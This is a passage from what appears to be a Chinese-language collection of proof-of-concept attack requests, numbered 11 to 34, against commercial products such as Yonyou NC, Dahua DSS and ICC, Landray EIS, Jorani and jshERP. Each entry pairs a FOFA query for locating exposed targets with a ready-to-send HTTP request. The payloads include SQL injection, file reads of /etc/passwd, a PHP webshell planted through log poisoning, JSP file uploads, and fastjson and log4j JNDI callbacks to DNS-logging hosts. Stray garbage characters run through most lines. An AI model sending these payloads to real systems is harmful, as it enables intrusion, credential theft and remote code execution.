% A0 B) B) Q5 G$ e; u: M% I
' u) n( Q4 {* L8 \7 c8 ^" T) H- ~
; T8 s: [8 a4 {/ x! I11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
! F+ y8 N8 }. ~- }9 U# wFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"3 D1 x( e, F* y
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
3 C2 N, e5 \5 i/ T2 D) xHost: 127.0.0.1( \  ?& Z6 [& h# G% v2 p
Pragma: no-cache0 ^7 ]* K# ?1 y3 b7 y( X
Cache-Control: no-cache
: Q* X* J4 O" b4 L9 v$ L" _% a- dUpgrade-Insecure-Requests: 12 c! f5 p/ ~7 S6 M8 A8 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
  b3 A) e4 l3 XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  g! ]9 B' u5 }' _7 ?2 s6 u1 ^
Accept-Encoding: gzip, deflate6 K8 ]0 u2 |! e  _- b
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
: Z* f" g+ ^! b/ b) _. v8 i# PConnection: close" y3 c$ I, x1 Z$ v

/ K8 P. K9 l3 i% c: x" f
5 K; ]: ]6 ^" |8 z0 P12. Jorani < 1.0.2 远程命令执行
5 e" `$ e+ S8 k! Z  p+ vFOFA:title="Jorani"
( d" ~9 O' m) X2 E5 Z第一步先拿到cookie
$ T' F9 e8 h* A; W: C2 bGET /session/login HTTP/1.1
* f/ M0 ]( \; r, X0 M6 xHost: 192.168.190.30) _9 w' c5 a9 _+ Y
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36/ D6 F1 O& r; i
Connection: close
( K. A' t6 p9 ~* w) k8 IAccept-Encoding: gzip4 P4 `: S1 C+ M/ m7 b& u& R

/ p0 _* A5 d( m$ e% J! _5 M/ x- |) l5 Z# Q, C+ T, V
响应中csrf_cookie_jorani用于后续请求: T8 Y5 s) R- Y" _6 V7 L6 c" v& J1 I0 s
HTTP/1.1 200 OK
& S9 D- @+ A4 c' l# W+ [% @Connection: close
# ]4 o# Q) z; J# i2 p7 qCache-Control: no-store, no-cache, must-revalidate  J9 T* y% }. ?5 Z5 i8 Y- x9 ^
Content-Type: text/html; charset=UTF-8" M, r! l: S' @$ @' j1 ~- Q- D9 j
Date: Tue, 24 Oct 2023 09:34:28 GMT) z. D- p; X8 j
Expires: Thu, 19 Nov 1981 08:52:00 GMT7 j' |$ V1 A$ e8 [9 Z9 n
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT6 F( x. `/ _4 C2 ~
Pragma: no-cache0 i; l" ?2 p1 X6 W! I, z1 W
Server: Apache/2.4.54 (Debian)
, [4 S0 {% a$ W/ {9 _Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=// a! R- f! [% G+ d) U
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly* n- A) n' [" _$ g3 k/ p# y
Vary: Accept-Encoding
4 z* c6 [+ j' f  S6 F/ D
# A: f# g& e% Y% d, C4 l: U# \) v  H% _' j7 n- r8 A0 m
POST请求,执行函数并进行base64编码- i; g1 a/ U, z5 p% ^0 d
POST /session/login HTTP/1.1; D+ L5 n9 M! ~  l8 E2 C0 W! D- T
Host: 192.168.190.30
, {) v* U. ]; q& LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
3 S1 B, o' S( K; Z. D7 CConnection: close3 d/ @  d, N  H# |% R1 M9 m
Content-Length: 2524 o& O. I7 E* H' M* _  j5 t' N9 P
Content-Type: application/x-www-form-urlencoded
0 z4 r# D  u9 }! z0 Y5 V+ oCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
' c) S# V$ {1 z, b- x6 ?8 B0 fAccept-Encoding: gzip, R. f5 T  n2 |6 U" H. y
6 p0 A; }5 ~2 c" I) \
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
, F  l' \+ k3 ]( I6 ?* S0 V8 _6 t- I" `. @

, Y; r& I2 V4 a. ^* i
* q; V* O9 V9 Q3 a3 P! ?; y向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
4 `- ~- U& A3 r. SGET /pages/view/log-2023-10-24 HTTP/1.1
( A' X! e; u: V6 u( THost: 192.168.190.30
' z7 }% D8 d. GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
3 h9 F) A5 t1 ^4 l. i6 G& {2 oConnection: close3 h( E0 B: T& ^$ _1 E% ]
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
( h2 O# X6 N9 e5 A& CK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=3 B0 c% G) Z4 G( x' ?  b/ J2 l
X-REQUESTED-WITH: XMLHttpRequest* v( j% k% @$ N6 e* \& ]+ c/ B& S8 m, Y) P
Accept-Encoding: gzip' L) H. j1 `/ t( U3 X+ J6 u7 k+ u

2 y9 h: f5 k# B; U6 T: o/ S+ O. n. }" z
13. 红帆iOffice ioFileDown任意文件读取
* b( b* N8 R$ {4 H! fFOFA:app="红帆-ioffice"# r1 R: z& v$ R4 I4 a( v# b
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
; P4 \/ F/ ?; M$ i' EHost: x.x.x.x8 b# {; m( J' H% B
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
" i) o8 ?  H$ d+ ]Connection: close
+ F) |1 e  Z/ ~; T! |' oAccept: */*
. ]; q; y9 `: p+ r1 Z4 qAccept-Encoding: gzip0 f& Z6 Z; `# h& N2 w  _  f" J
+ u, t) ?& P7 @% w4 o8 K# Q) I
8 @& ^* Z$ I" Q7 {7 {* Y
14. 华夏ERP(jshERP)敏感信息泄露
( T( R+ e" @4 `FOFA:body="jshERP-boot"
; d7 L+ s( q: N" c8 \+ [  ^! a泄露内容包括用户名密码
7 c2 z# o" J& jGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
) u5 S7 _9 l& O* ~' XHost: x.x.x.x0 l$ u0 g1 F7 Z& d6 Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
, z& [* |5 j& c! Y. fConnection: close/ D$ k8 Q9 k; m# z6 e/ J: @* B- N
Accept: */*, W5 l( m/ v$ H2 r1 l0 _
Accept-Language: en# d: J' t$ F' s" [# }# W: w6 Y/ v
Accept-Encoding: gzip
* |  t; q4 k. B- p8 y* |7 L- ~: P& K" r; F

& {. E* x9 Y" B0 a& i+ \15. 华夏ERP getAllList信息泄露
& P* T5 \$ z  a% y1 G* h! dCVE-2024-0490
' M1 {2 f/ ]7 O  j2 YFOFA:body="jshERP-boot"/ O3 D/ U0 }; L. _* n8 x
泄露内容包括用户名密码
+ ]" C( A/ ~: t5 TGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
" Z; l. m. s& [Host: 192.168.40.130:100: Q" r% x6 @7 L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
) Q. T5 k" E% c& r/ kConnection: close
8 ~) h4 C1 u# n, qAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.83 ?7 A4 E' y8 \! M2 K7 S
Accept-Language: en9 j# z$ g9 G  l7 L. X
sec-ch-ua-platform: Windows
) e& ?' {8 N" I2 o$ T/ U( bAccept-Encoding: gzip6 D2 |* ]% B, S* o4 @- x
1 a5 _( t/ O% }' I( x8 [# ~. L% i! J5 j
' m# F: I4 f) `% O
16.  红帆HFOffice医微云SQL注入, ~. E( P+ T6 B& L6 p0 r# G. [$ w
FOFA:title="HFOffice"
( ?- U; c: A$ p" o  J. ?. Ipoc中调用函数计算1234的md5值. J- h) n+ Y2 d: s1 ?4 D
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
, B! x* D* ^% c. b) z+ mHost: x.x.x.x0 U, H% t4 G3 i1 W; `! F6 X
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36. T0 u' p& s( h
Connection: close
- k+ i* |( \* \/ @Accept: */*
7 I. r7 N4 n" _, HAccept-Language: en
; w: C( U; v  SAccept-Encoding: gzip/ G* T& f: s5 H6 X8 {$ O

$ r8 T: `, q% P  @2 |  L% ]% b- D$ ]) k8 u; c; S, o: x
17. 大华 DSS itcBulletin SQL 注入6 E: e8 T% W9 B& ^4 H$ E; b/ V
FOFA:app="dahua-DSS"4 K+ e8 X+ [' d
POST /portal/services/itcBulletin?wsdl HTTP/1.16 Z) n- z0 _* M
Host: x.x.x.x
/ d1 e$ d7 q' i6 rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 v% {" a! r8 s+ j# M9 gConnection: close
: N# B7 p5 R' W1 O0 QContent-Length: 345, ~- E6 V4 x9 f% M7 N
Accept-Encoding: gzip
. T! T0 n5 _6 @% o2 s4 h' z4 {2 E& _, h+ b( \+ U7 H
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>$ ]/ r$ U; `9 Z1 Z1 z$ G# E3 n/ i
<s11:Body>" c% e3 o* r5 ?- m
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>/ b: q" y9 Y) J4 f
      <netMarkings>  I% j# N) t- c6 s2 J& a
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1/ _# ?5 K- B& _) O3 _$ `3 {
      </netMarkings>' Y# T1 [" T& L" o7 ?; r
    </ns1:deleteBulletin>
4 P/ E1 t9 K  I  </s11:Body>
/ G2 r6 w$ ]4 E2 p5 L- Q) v</s11:Envelope>
0 x6 m8 I8 h; t- X* S* I0 g
' U( N' S0 p, G8 X* e; d2 O2 v9 s9 H& C! s9 D6 V. R& r/ m
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露  Z* n) [6 a4 U+ ~9 N' F6 E$ H- p
FOFA:app="dahua-DSS"
; L0 G$ G. Y; ~' ]. k0 |GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
$ ]2 g6 J* o+ G7 j; W1 P+ @* c$ h: }Host: your-ip. Q) B% U- ?' _$ I* q% `# Q% i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. I" c! t: F/ l4 J# {5 e* }! mAccept-Encoding: gzip, deflate* x! G3 J( `' W( {
Accept: */*
1 k( h+ I" v2 z8 X9 ], g) BConnection: keep-alive  i9 t, r0 P; ~4 O6 [

$ n0 F( R# I- A1 u. B' t& F( W% X  c) _
6 B, g# R3 [, a. |' J2 G
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
/ g# w! `; ?3 Q# X6 X$ |2 h5 Q5 K) Z# LFOFA:app="dahua-DSS"
5 i: ^# D6 o+ e3 C' |7 n+ O+ t" YGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1* o" L9 ~. b' g7 q  k
Host:( N4 g& m1 v' q1 B8 ~
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.369 `9 m4 t( u$ D  o( d
Accept-Encoding: gzip, deflate
- @5 Y5 g! {: Q0 ?0 BAccept: */*( o+ s7 d6 a$ _2 V9 A- G% R. G+ `; y
Connection: keep-alive
) o: j/ t. J1 b3 @5 d$ s4 M9 ^6 p# y6 [* b$ K) a) i
6 Z5 j* u  W1 J- [/ c6 ^( J: U
20. 大华ICC智能物联综合管理平台任意文件读取
/ v- b5 P7 I& J+ |4 w) fFOFA:body="*客户端会小于800*") t; a% g% r" D( m4 z
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
) B8 Y6 z) L# E+ M, n. U" XHost: x.x.x.x) B$ a. F3 ?; o1 K/ }
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 l, U8 Z, D+ V/ f# o  S$ ]& `Connection: close# T# d9 k/ T% C% w4 l2 V
Accept: */*
/ W( F5 v7 q. A0 Z0 B8 ~* BAccept-Language: en
) d( ?3 T9 I8 t; L" TAccept-Encoding: gzip( a6 C4 t6 h6 o$ Y
" O0 }4 k6 J- t) U' L3 B: P& a
! L* M; A1 ~: B) m
21. 大华ICC智能物联综合管理平台random远程代码执行, |! _( J) K, H' s8 R
FOFA:icon_hash="-1935899595"
& x8 }; Z1 R; |" qPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
$ H  C6 _3 ?! o4 mHost: x.x.x.x
: r4 ]- Y: z3 Q& yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; L# N- M. O8 I; `: E% q1 `
Content-Length: 161
" f) \. c4 ^* D) OAccept-Encoding: gzip  b, D3 f- M3 u
Connection: close6 l) _$ Y0 B' |8 n. G& e% M, _
Content-Type: application/json;charset=utf-8
' E/ z' V% a9 b5 @- ]- U5 c2 J' Y$ c  }: \0 }2 I) W( T) D- S
{$ B5 K, Z( o' E7 f# Q1 ?5 c
"a":{
6 e6 E7 C4 B8 N* N! P/ E   "@type":"com.alibaba.fastjson.JSONObject",
1 W9 |$ l: {, p" j5 V6 G    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
; l# u; k, @4 K' b' @+ B  }""/ n7 e; @7 Q. V7 s
}! [- \% c# B2 S! B7 q0 t
5 m, @3 V: B7 B, Q5 o
  A/ _, d) U. C0 n& w
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
. X2 W$ Y0 ^9 s1 kFOFA:icon_hash="-1935899595"0 X! N4 F9 O$ a$ L* t4 [: M, |* R
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.15 ^, M& @+ t  s
Host: your-ip+ j6 j: ]' G' P2 Y. m# w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
! E! k9 R9 u4 N+ i4 k1 ]; B# rContent-Type: application/json;charset=utf-8% h' |; e  V) M8 \0 x
6 a0 \- M6 H6 U3 ]
{( y9 A% w  I2 `+ t6 W. i" N7 Z
"loginName":"${jndi:ldap://dnslog}"
4 I, n8 F" `5 [- {}5 L) E" `9 K. v1 ~; m5 R

) P5 u) L8 o1 j1 k; e# V
' j% Q. U. b2 D; V, b" r
" b% c; K+ p! C: [+ C23. 大华ICC智能物联综合管理平台 fastjson远程代码执行* @, o) E2 m7 j
FOFA:icon_hash="-1935899595"( D( m4 H1 w3 o- E! U5 u, h
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
! n" e- R8 |9 {: D" g+ N9 H( L% tHost: your-ip
- G5 u& m. ?  g1 T  ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, u6 e" H2 y: \. Y+ _Content-Type: application/json;charset=utf-8/ Z8 I/ e) S- F7 Z. P2 C
Accept-Encoding: gzip- d8 V  X# t# K  o; a
Connection: close
: X2 H8 k$ p# S; }' P' d/ o# _& u4 ]
. l+ `4 B) `) W. [{
1 F, ]9 R, a4 O  z- I2 p    "a":{# I! e1 O6 P7 e9 s+ D
        "@type":"com.alibaba.fastjson.JSONObject",
% q- ]3 W! k4 U7 d       {"@type":"java.net.URL","val":"http://DNSLOG"}( I9 d/ \" ~6 S9 R9 x, h9 f) D
        }""
9 v+ T  B% k" y( Z1 p}! t8 A# l0 q. c

# D0 a: E5 E5 `! {5 ?, O' ]2 ?- @& L6 W% l) \& \+ X
24. 用友NC 6.5 accept.jsp任意文件上传. q9 ^2 M# ]! u, `
FOFA:icon_hash="1085941792"2 N: ?* [& O1 Q
POST /aim/equipmap/accept.jsp HTTP/1.1
  u  M( F1 f% o2 [" mHost: x.x.x.x
+ S& ^( M1 k8 u5 i% W0 v6 mUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.360 M* U, Y6 D) G* x  z3 d
Connection: close6 }" k7 z+ G: O. W8 _
Content-Length: 4497 g2 h" b- T- P1 |* P
Accept: */*
# r5 e. p( F9 |Accept-Encoding: gzip! [& k5 W2 n1 ^( Q( s: x
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
5 W- R! N; m) K7 n: Y# _1 j3 l- _$ x) z
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc; n$ ~$ j( z- J. {! q
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"* [: E% ]1 o' O  ^; Y4 @8 S* I
Content-Type: text/plain
" V2 s1 Q+ A2 Z6 q- p# C6 @
7 T% W, R$ I8 @$ B5 [<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
+ D, N2 Q8 g! t4 A8 {9 p-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc* n7 O, W: Y0 y2 P1 c
Content-Disposition: form-data; name="fname"
: y  x0 G7 f6 k1 B
3 O' @; {$ j" {: G3 k+ n( z\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
% N- _. ]) m% Q" M-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
, b% K" Y& U/ o& ]
5 i' z4 K' `+ ?- ~' J1 ?5 W
3 D: O, B8 U& j( a25. 用友NC registerServlet JNDI 远程代码执行
, d7 X2 L3 z2 K2 `FOFA:app="用友-UFIDA-NC"6 `7 ]9 q1 H! \$ v: c
POST /portal/registerServlet HTTP/1.1' i1 n% L4 r) z  k* u
Host: your-ip
2 R( v% J. }/ ?8 \/ G8 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0; A) d- u, T' O# Q; C. C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
" K9 W3 Z! q# J3 w! b2 _0 m9 @Accept-Encoding: gzip, deflate4 H4 t9 v$ D1 V$ ?! e
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6$ T- q/ ~7 n4 M+ n+ \: ^
Content-Type: application/x-www-form-urlencoded- g/ S" x! S' B- h' v  J

1 u6 P& U! y' v; N6 p4 x" [type=1&dsname=ldap://dnslog
% L+ V% W3 u" C& ^& _7 z
( ?# ]2 |1 O1 C7 y$ |7 ~3 o% R$ {9 \
9 T* d" _2 j1 J' e
26. 用友NC linkVoucher SQL注入
1 B5 k0 A7 y/ J& D- y! WFOFA:app="用友-UFIDA-NC"
0 i/ M! Y' W3 N6 r* HGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.11 O0 O% G) Y" x+ `
Host: your-ip
: R+ h& t0 X& TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 J0 T/ ^* w, ^! x: R+ ?
Content-Type: application/x-www-form-urlencoded; V3 K/ m0 b0 A: o
Accept-Encoding: gzip, deflate9 ]7 [% b- X, `3 I0 Y; K3 F
Accept: */*
4 b. a( U0 p  g% I9 P" ]+ A  j! ]Connection: keep-alive
* i  x  w' H; E* `! A$ g8 w) m$ y+ f% @7 \) b
: z) e* f6 ?$ @- D9 P3 Z( |8 k
27. 用友 NC showcontent SQL注入! d8 [2 Y: \1 D" @4 x' o
FOFA:icon_hash="1085941792"
; Z# B$ {1 w' ~# d6 QGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
: T7 t$ u; t' B# B  m* W1 iHost: your-ip8 j! s* S6 @+ ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 {' `8 T9 U; X9 g) uAccept-Encoding: identity  W/ [4 V# x: V) i
Connection: close' g/ |& p/ u3 I; r/ W8 `
Content-Type: text/xml; charset=utf-8+ _# O; X9 A8 u; e2 s

5 q6 E, w& B3 S+ y5 x
# {8 {( b2 U+ K; B0 y28. 用友NC grouptemplet 任意文件上传
0 }# _# l% u3 a# M$ U4 TFOFA:icon_hash="1085941792"
. H& H; s* \6 x& a" XPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.12 _( h7 b2 r* z" T1 M7 w& T4 `
Host: x.x.x.x
/ y- u' b+ _' NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36- J9 b7 k) h+ _: O& w
Connection: close" |' s3 |- X; V9 K* D3 n
Content-Length: 268
& I2 F: ^, q; s  B; IContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk; ?, \8 P; V) N/ u7 l0 y3 m3 v# F
Accept-Encoding: gzip
5 o! y/ b% }+ s5 f) u' r& ]
* E6 Z8 k& v3 Y2 ~0 o8 ~* c------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
' \' K% }; ^/ U' L9 `. S9 GContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"* }, D; S0 K# q* A& P
Content-Type: application/octet-stream
9 ]' a: B  d7 x/ z' s1 M
9 Q4 P" u7 O' `0 t; Q8 G<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>8 I, j  B- D8 y
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--8 D$ e' X, l& ?( `2 @+ w
  g9 R4 d4 S! C3 P; K

  T5 J; K! T7 e: p/uapim/static/pages/nc/head.jsp' N; x, A  k8 b& R% V

1 `$ r  P" t8 k4 @7 [29. 用友NC down/bill SQL注入
, `( M; A* U9 S# e7 {FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"# N, u) k0 |& C: x- K, m
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
" h0 |7 w1 H1 v7 SHost: your-ip) B$ }" W; l4 x/ ~. \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' p& {. q" c4 i6 ^' m
Content-Type: application/x-www-form-urlencoded
2 E0 [, d" U) dAccept-Encoding: gzip, deflate) t6 @, q2 v( R& ^( b
Accept: */*- e; w; J: u- ]7 M5 \2 J+ S
Connection: keep-alive9 T; p: D* M" U& O

! y' }- `7 l5 d+ R3 Z
6 ?, w2 m4 U' n4 w5 s6 l30. 用友NC importPml SQL注入
8 Y4 h  K9 a7 g: oFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif", b( p( n) E  N* z+ Y8 T* ]
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1/ k3 o( B$ O' k  @
Host: your-ip8 K; g. |. b0 T" i6 i1 ~5 L
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
) p0 C  o- l* F3 G2 w- G/ G2 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.360 K8 y2 a8 c3 |4 L
Connection: close% T: Y+ V4 w5 w7 e9 w& {, U

) A& x; }% w0 Z/ U) K2 U$ ^------WebKitFormBoundaryH970hbttBhoCyj9V2 R1 ]6 e  U3 p& i5 H
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"! r$ k, N8 P2 R$ ?: R
Content-Type: image/jpeg
! U, \- {8 K, S/ @6 t------WebKitFormBoundaryH970hbttBhoCyj9V--
* P) \( h. t9 c5 D% Y6 Q
, V; u1 z; y8 k2 H  u. u. D: t
' K5 n: W) V/ o4 M% q  z31. 用友NC runStateServlet SQL注入
, {% r- E0 F! Hversion<=6.5
# E+ a! r6 W9 v/ L5 X1 C5 HFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
5 ~: ~5 j3 y- t- l. z$ p; r& b$ i  OGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.17 Z. v9 V  G( T7 _* G  g3 b; h, M
Host: host
, W9 o; e% ^# W& x5 u; Q4 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36' y% q7 h$ p* q6 Z
Content-Type: application/x-www-form-urlencoded0 b  _( g2 g2 b9 f9 C

# Z% r# f* N. b7 j( ^7 C6 V9 P, X5 h; H
32. 用友NC complainbilldetail SQL注入9 T# L& W3 h8 m( X
version= NC633、NC65
) Q- a& `# t% N! Z+ m: k$ jFOFA:app="用友-UFIDA-NC"
( D( G3 J7 P0 k( w) J) H4 `: Y6 ^GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 p2 i( Y& @; nHost: your-ip& i4 Z6 a, `9 U# W8 O& k$ o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 V) }7 y( y# @0 v( D9 F; Z3 lContent-Type: application/x-www-form-urlencoded
0 b2 J0 V) ]) j, `7 y- {- ~- A% m1 LAccept-Encoding: gzip, deflate
: w- w* l0 g7 A( Z  i" F7 ^5 {9 h' ^Accept: */*
+ o$ j- i5 i4 @, o1 aConnection: keep-alive) G4 m% K) c, D7 b" |

( v6 a% z. g& C; d, m1 ]* N2 e/ E8 ]
33. 用友NC downTax/download SQL注入% j/ |) U& m4 q$ H4 ~9 z
version:NC6.5FOFA:app="用友-UFIDA-NC"
" J5 m5 e+ Q/ ~3 RGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1+ P9 W, w! C; v2 [
Host: your-ip1 _3 |0 `* `% {7 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  x1 R5 e0 n7 n/ A+ Y- uContent-Type: application/x-www-form-urlencoded
% G. z* b0 z* H4 |Accept-Encoding: gzip, deflate
, V0 E) a& N$ ?, e) D' m& OAccept: */*
) e6 N, j2 I6 i7 Q% E3 zConnection: keep-alive
7 T( q: h9 y& R) L  E  g
3 G! c) Q; V8 i# }+ u8 n& n$ ~( w# R  z9 h
34. 用友NC warningDetailInfo接口SQL注入
; J+ A$ ?6 H0 `0 e& ^% Z/ y+ FFOFA:app="用友-UFIDA-NC"
2 P# B+ n$ X: S. N, vGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
4 P: k6 R( l% G/ K( `" nHost: your-ip
/ @/ r. v+ P% K+ GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' j) |5 H; Z, ?  V2 u
Content-Type: application/x-www-form-urlencoded; M2 `" n* u( H- M
